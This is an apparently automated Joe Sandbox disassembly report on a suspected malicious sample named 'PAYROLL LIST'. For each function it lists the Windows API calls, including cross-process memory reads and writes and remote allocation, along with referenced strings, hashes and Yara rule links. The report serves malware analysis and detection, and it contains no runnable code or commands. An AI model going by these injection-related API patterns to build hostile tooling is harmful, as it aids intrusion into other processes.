REMOVE, xrefs: 00A64676

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 758db92dcc3bb80ee8ac0eacbe1fb80844672fe15e6f978fb755d94169e2fc7d
Instruction ID: 54aabf5ddfc05e69a82824fb92b488f132e5341f0b834e838d20a3ffa7c61fa3
Opcode Fuzzy Hash: 758db92dcc3bb80ee8ac0eacbe1fb80844672fe15e6f978fb755d94169e2fc7d
Instruction Fuzzy Hash: B0419034A002199FCF05EFA8D981AAEB7B5FF4D304F148069E916AB3A2DB34DD45CB50

Function 00A5C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A5BC08,?,?,00000034,00000800,?,00000034), ref: 00A64335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A5C1D3

Part of subcall function 00A642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A5BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00A64300

Part of subcall function 00A6422F: GetWindowThreadProcessId.USER32(?,?), ref: 00A6425A
Part of subcall function 00A6422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A5BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00A6426A
Part of subcall function 00A6422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A5BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00A64280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A5C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A5C28D

Strings

@, xrefs: 00A5C2A5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ef30a13ceb8131eb5b36142600b779eb2e42c7e0b7d845a5e4a408e759dfc13d
Instruction ID: 3321c898f1b0da9991a4e11670f763a4754bf71c8b13decec6d3c7b3bd72595c
Opcode Fuzzy Hash: ef30a13ceb8131eb5b36142600b779eb2e42c7e0b7d845a5e4a408e759dfc13d
Instruction Fuzzy Hash: 28412A76900218BFDB11EFA4CD81AEEBBB8BF09710F104095FA55BB181DA716E49CB61

Function 00A8A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ABDC00,00000000,?,?,?,?), ref: 00A8A6D8
GetWindowLongW.USER32 ref: 00A8A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A8A705

Strings

SysTreeView32, xrefs: 00A8A6AA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 06ab6deca4a8874e4c53cde1bebc8ba8c087cf7898330a86558c325987f83790
Instruction ID: 0fdff43b19bdccdbdab0c76267509b461e8507c159397065ab5b984b73365998
Opcode Fuzzy Hash: 06ab6deca4a8874e4c53cde1bebc8ba8c087cf7898330a86558c325987f83790
Instruction Fuzzy Hash: 4331EF31600206AFEB11AF78CC41BEA7BA9FB59324F244726F875D32E0D730AC519B50

Function 00A8A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A8A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A8A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A8A196

Strings

SysMonthCal32, xrefs: 00A8A129

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c728489c0b41ac1d37aa1890d4a941384e944aa636bc2c2a23aa18afc139567d
Instruction ID: 8182be0f14de92dff93b96c4cf30e9e5bb1a7b86280e1af40ccab88169d1be56
Opcode Fuzzy Hash: c728489c0b41ac1d37aa1890d4a941384e944aa636bc2c2a23aa18afc139567d
Instruction Fuzzy Hash: 3F219C32510218ABEF11DFA4CC86FEA3B7AFF58714F110215FA56AB1D0D6B5AC51CBA0

Function 00A8A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A8A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A8A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A8A956

Strings

msctls_updown32, xrefs: 00A8A8BB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 58b84be4b735998f8c7d0c0605bf6fc500db0226f368f8d46983c7750d4e3264
Instruction ID: 9d8c701ff5fd694b1ca1ab9211197afa09af6dc7a496447bc202c00819b63756
Opcode Fuzzy Hash: 58b84be4b735998f8c7d0c0605bf6fc500db0226f368f8d46983c7750d4e3264
Instruction Fuzzy Hash: 842190B5600619AFEB10EF58DCC1D6737ADEB5A3A4F05005AFA059B2A1DB30EC12CB61

Function 00A899A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A89A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A89A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A89A65

Strings

Listbox, xrefs: 00A899FD

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 882f4275cf40393f413d1bfed2c1649a3edb3c73ab6a2d58197282d8c7dd9392
Instruction ID: 616b6e56f9e683df7b1ba36b30748a8b200b9ce8e251c6d067644c470d1d12f6
Opcode Fuzzy Hash: 882f4275cf40393f413d1bfed2c1649a3edb3c73ab6a2d58197282d8c7dd9392
Instruction Fuzzy Hash: 1721C232610118BFDF25AF54CC85EBF3BAEEF897A0F058129F9459B1A0C7719C1287A0

Function 00A8A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A8A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A8A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A8A48F

Strings

msctls_trackbar32, xrefs: 00A8A444

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a05c867c5112959fb88b31dafdb59fe5da1df212ab0486cb26335465af4fb2c2
Instruction ID: 32b1c6f667e22f5bb9a45de4db8f6f58c89ebdda223eec2b55e660a62b7e75c1
Opcode Fuzzy Hash: a05c867c5112959fb88b31dafdb59fe5da1df212ab0486cb26335465af4fb2c2
Instruction Fuzzy Hash: 7E110671240208BEEF20AF64CC49FEB3B6DFF99754F014219FA45A60E1D2B2E811CB20

Function 00A42287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A42350,?), ref: 00A422A1
GetProcAddress.KERNEL32(00000000), ref: 00A422A8

Strings

RoInitialize, xrefs: 00A42290
combase.dll, xrefs: 00A4229C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 966e172235e6add53370755d4f15787f0189a0489bcded7493e612fa2aa1da95
Instruction ID: 020c970a97c1d51247762ddc06eec4c547e0f8202a214abef2927e2d7097c56e
Opcode Fuzzy Hash: 966e172235e6add53370755d4f15787f0189a0489bcded7493e612fa2aa1da95
Instruction Fuzzy Hash: 32E0EE74A90341AADA209FE0EC8AB593A64BB52B02F404620B183DA0E0DBF94486CB08

Function 00A4235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A42276), ref: 00A42376
GetProcAddress.KERNEL32(00000000), ref: 00A4237D

Strings

combase.dll, xrefs: 00A42371
RoUninitialize, xrefs: 00A42365

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 383ba5fb604407870f5fe133fbdd90e5a106374fb927cd1904d2a87c2f928b3c
Instruction ID: e936078e83f325584847323dab859f172d3b20a557b96610e10c2f4082d563e7
Opcode Fuzzy Hash: 383ba5fb604407870f5fe133fbdd90e5a106374fb927cd1904d2a87c2f928b3c
Instruction Fuzzy Hash: E9E09274685341ABDA20DFE0ED49F043A65B715702F104514F14BDA4F0CBF968868B14

Function 00A9AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A9AC60
__swprintf.LIBCMT ref: 00A9AC94

Strings

WIN_XPe, xrefs: 00A9ACD3
%.3d, xrefs: 00A9AC6E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 07b3d48911fcb3f0fae48b21f6e32cfe8ed7a2c8ce63dca60a244845b8346d11
Instruction ID: b27f6286c97e3353b7459c52482491918fe616c07cf201f57e7a141e57194ace
Opcode Fuzzy Hash: 07b3d48911fcb3f0fae48b21f6e32cfe8ed7a2c8ce63dca60a244845b8346d11
Instruction Fuzzy Hash: B4E012B1904618EBCF50D7D0DD09DF973FCA718741F100493B947A5500D7359B94EA52

Function 00A242F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00A242EC,?,00A242AA,?), ref: 00A24304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A24316

Strings

kernel32.dll, xrefs: 00A242FF
Wow64RevertWow64FsRedirection, xrefs: 00A24310

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 142678f8f431381ed7f774cbdd47be935b9141d446d9d12b310df5e5fc9cc068
Instruction ID: 811865f57241ce51a3286ed3225ad9772e391f3f07f73b82afd12aa662b44c34
Opcode Fuzzy Hash: 142678f8f431381ed7f774cbdd47be935b9141d446d9d12b310df5e5fc9cc068
Instruction Fuzzy Hash: 70D0A731400723AFC720CFA4F80C60577D4BF19301B00892AE487D26A0DBB0C881C710

Function 00A82205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A821FB,?,00A823EF), ref: 00A82213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00A82225

Strings

kernel32.dll, xrefs: 00A8220E
GetProcessId, xrefs: 00A8221F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: fea02c7acaa2b5c9c56d0237dccb9e90921a3f7b15aa75779b061cff07a68427
Instruction ID: 2b01eb8adfb138018a6db47d0c41755f4baed89b72fc75a674d1e479eed0168e
Opcode Fuzzy Hash: fea02c7acaa2b5c9c56d0237dccb9e90921a3f7b15aa75779b061cff07a68427
Instruction Fuzzy Hash: 0FD05E34400713AFC7219BA0B808751B6D4FB0A300F00491AE887A2690EB70D8818750

Function 00A2434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00A241BB,00A24341,?,00A2422F,?,00A241BB,?,?,?,?,00A239FE,?,00000001), ref: 00A24359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A2436B

Strings

kernel32.dll, xrefs: 00A24354
Wow64DisableWow64FsRedirection, xrefs: 00A24365

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 9b38abd5c1835655bceda219655bb8a2ca3048bb2bff2ef005adc5e58fdb4134
Instruction ID: fd6be71c8ea53b510b95e6acd895c2865fa63ee15c02f44650d2968318c087b4
Opcode Fuzzy Hash: 9b38abd5c1835655bceda219655bb8a2ca3048bb2bff2ef005adc5e58fdb4134
Instruction Fuzzy Hash: 77D0A731800723BFC720CFB4F80860177D4BF25725B004A2AE4C3D2690DBB0D881C750

Function 00A60539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00A6051D,?,00A605FE), ref: 00A60547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00A60559

Strings

RegisterTypeLibForUser, xrefs: 00A60553
oleaut32.dll, xrefs: 00A60542

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: ba8026f15d5cd11411e32936811bf534b9e9e527cd90966d6bd92e178db056d2
Instruction ID: c67640bfb0018677a121ab87f85a79330aa0d97c15e96c34ec8872b8bb3c4e7d
Opcode Fuzzy Hash: ba8026f15d5cd11411e32936811bf534b9e9e527cd90966d6bd92e178db056d2
Instruction Fuzzy Hash: 37D09E71554712AED7209BA5A808A56B6B4AB15711B10CD1AE497926A0D770CC81CB50

Function 00A60564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00A6052F,?,00A606D7), ref: 00A60572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00A60584

Strings

oleaut32.dll, xrefs: 00A6056D
UnRegisterTypeLibForUser, xrefs: 00A6057E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 379acebd6760013d8065ee42e84e0f78b6e7e7477cf2cafba6ff641a31e993a0
Instruction ID: 5df41989100ddc83942fcd18feeccc29c459494040dc10079548006c2381c3c8
Opcode Fuzzy Hash: 379acebd6760013d8065ee42e84e0f78b6e7e7477cf2cafba6ff641a31e993a0
Instruction Fuzzy Hash: 48D09E71504722AAD7209FA5A808B57B7F4AB19711F10891BE89792690D770D4C1CB60

Function 00A7ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A7ECBE,?,00A7EBBB), ref: 00A7ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A7ECE8

Strings

kernel32.dll, xrefs: 00A7ECD1
GetSystemWow64DirectoryW, xrefs: 00A7ECE2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: baa2c28e0edbcff546257bb092860c148b5a740a2477926a124d97b0b3b1a74d
Instruction ID: 591bf257279e295a0f7151cc18ec75e70b8a0f23ca52c4bbc98a545ed53e7c34
Opcode Fuzzy Hash: baa2c28e0edbcff546257bb092860c148b5a740a2477926a124d97b0b3b1a74d
Instruction Fuzzy Hash: 59D05E75400723AFCB219BA0AC486027AE4BB09304B00C95AE88B92690DB70C8818A50

Function 00A7BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00A7BAD3,00000001,00A7B6EE,?,00ABDC00), ref: 00A7BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A7BAFD

Strings

kernel32.dll, xrefs: 00A7BAE6
GetModuleHandleExW, xrefs: 00A7BAF7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: b80d7d108aa231c25494b93a98a4ec393106d672ac188eecc03449206c7a14c0
Instruction ID: 65c5309b2250f7317fad9e6d3fa03d3fe65e9e3377f0edfbc54c7ed7adac0590
Opcode Fuzzy Hash: b80d7d108aa231c25494b93a98a4ec393106d672ac188eecc03449206c7a14c0
Instruction Fuzzy Hash: 5ED05E70910713AFC7309FA0AC48B1176D4BB09300F00C91AE887D2694DB70C881C620

Function 00A83BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

